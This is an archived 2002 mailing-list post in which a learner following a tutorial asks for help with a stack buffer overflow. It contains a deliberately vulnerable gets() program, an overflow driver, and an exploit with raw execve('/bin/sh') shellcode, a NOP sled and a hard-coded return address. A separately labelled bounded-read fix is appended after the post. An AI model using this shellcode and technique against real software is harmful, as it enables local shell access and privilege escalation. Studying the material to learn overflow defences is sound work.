In reading the following link, I decided to play with the examples and try to figure out a simple buffer overflow. Just to say I've at least made one do something predictable. At any rate, I have gotten to the point where I can make the program call the function twice before dumping. I am a little stuck when it comes to inserting the shellcode. I'll highlight what I think is the code I'm not understanding completely. Please take a look if you have time, and even if you don't, thanks for reading the post:

http://www.neworder.box.sk/newsread.php?newsid=5333

Below is a modified version of the code presented on the above link. I assume NO CREDIT for this code other than I have changed a couple of variables. I'm just trying to illustrate a concept rather than create something original at this point. Keeping this in mind, read on:

--------------------------------
/* This one works: */
/* PROGRAM WITH BUFFER OF 255 */
/* TESTDS.C */

#include <stdio.h>

void lame()
{
    char small[255];
    gets(small);                /* unbounded read into a 255-byte buffer */
    printf("%s\n", small);
}

int main()
{
    lame();
    return 0;
}
-----------------------------------
/* Running this one and piping the output to testds makes the program run twice: */
/* PROGRAM TO OVERFLOW TESTDS */
/* This will hit call lame twice, so the output should be two identical lines
   followed by a core dump */
/* If it does not core dump, issue the ulimit -c 10000 command */
/* TESTDS_EXPLOIT.C */

#include <stdio.h>

int main()
{
    int i = 0;
    char buf[269];                     /* 268 payload bytes plus a terminating NUL for puts() */
    for (i = 0; i < 268; i += 4)       /* i <= 268 would write four bytes past the end of buf */
        *(long *)&buf[i] = 0x80484ca;  /* 4-byte long, i.e. a 32-bit build as in the tutorial */
    buf[268] = '\0';
    puts(buf);
    return 0;
}
------------------------------------
/* I don't think I have the memory address or something correct. This is where
   I need help. Anyone?!? */
/* PROGRAM TO RUN SHELLCODE FROM TESTDS */
/* 1 Fill the buffer with the return address, */
/* 2 Fill the buffer with NOPS, */
/* 3 Copy the shellcode at the end of the NOPS, */
/* 4 set the home variable and */
/* 5 execute TESTDS. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] =
    "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0"
    "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd"
    "\x80\xe8\xde\xff\xff\xff/bin/sh";

int main()
{
    char buffer[269];                  /* 268 payload bytes plus a terminating NUL for setenv() */
    long retaddr = 0xbffffa10;         /* Return Address, I got this from info reg esp
                                          after overflowing the buffer */
    int i;

    fprintf(stderr, "using address 0x%lx\n", retaddr);
    for (i = 0; i < 268; i += 4)
        *(long *)&buffer[i] = retaddr;                    /* Fills Buffer with Ret Address */
    for (i = 0; i < 268 - strlen(shellcode) - 100; i++)
        *(buffer + i) = 0x90;                             /* Fills the Buffer with NOPS */
    memcpy(buffer + i, shellcode, strlen(shellcode));     /* Shellcode is copied at the end of the NOPS */
    buffer[268] = '\0';
    setenv("HOME", buffer, 1);                            /* Sets HOME VARIABLE */
    execlp("TESTDS", "TESTDS", NULL);                     /* Execute Program */
    return 0;
}

Thanks for the assistance.
-Jeremy
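The bounded counterpart of lame() from the first program, added here as example code that is not part of Jeremy's post or the tutorial he cites: same 255-byte buffer, but the read is limited to the buffer size, so a 268-byte line like the one TESTDS_EXPLOIT.C produces is reported and dropped instead of overwriting the saved return address. The status codes, function names and the fmemopen-based helper are constructed for this illustration.

```c
/* Added example, not from the post; status codes and names are constructed. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

enum { READ_OK = 0, READ_EOF = -1, READ_TOO_LONG = -2 };

/* Read one line into dst (capacity cap) and strip the newline. A line that does
 * not fit is consumed and discarded, dst is cleared, and READ_TOO_LONG returned. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) return READ_EOF;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return READ_OK;
    }
    int c = fgetc(in);                 /* no newline: hit EOF or ran out of room */
    if (c == EOF || c == '\n')
        return READ_OK;                /* the line fit exactly */
    while (c != '\n' && c != EOF)
        c = fgetc(in);                 /* swallow the bytes that would have overflowed */
    dst[0] = '\0';
    return READ_TOO_LONG;
}

/* Same 255-byte buffer as lame(), but the read is bounded by sizeof small. */
int lame_safe(FILE *in)
{
    char small[255];
    int rc = read_line_bounded(small, sizeof small, in);
    if (rc == READ_TOO_LONG)
        fprintf(stderr, "line longer than %zu bytes rejected\n", sizeof small - 1);
    else if (rc == READ_OK)
        printf("%s\n", small);
    return rc;
}

/* Feed a line of n copies of ch (like the 268-byte fill above) to lame_safe. */
int lame_safe_fill(char ch, size_t n)
{
    char line[512];
    if (n + 2 > sizeof line) return READ_EOF;
    memset(line, ch, n); line[n] = '\n'; line[n + 1] = '\0';
    FILE *in = fmemopen(line, n + 1, "r");
    int rc = in ? lame_safe(in) : READ_EOF;
    if (in) fclose(in);
    return rc;
}
```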
This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 13:14:22 PDT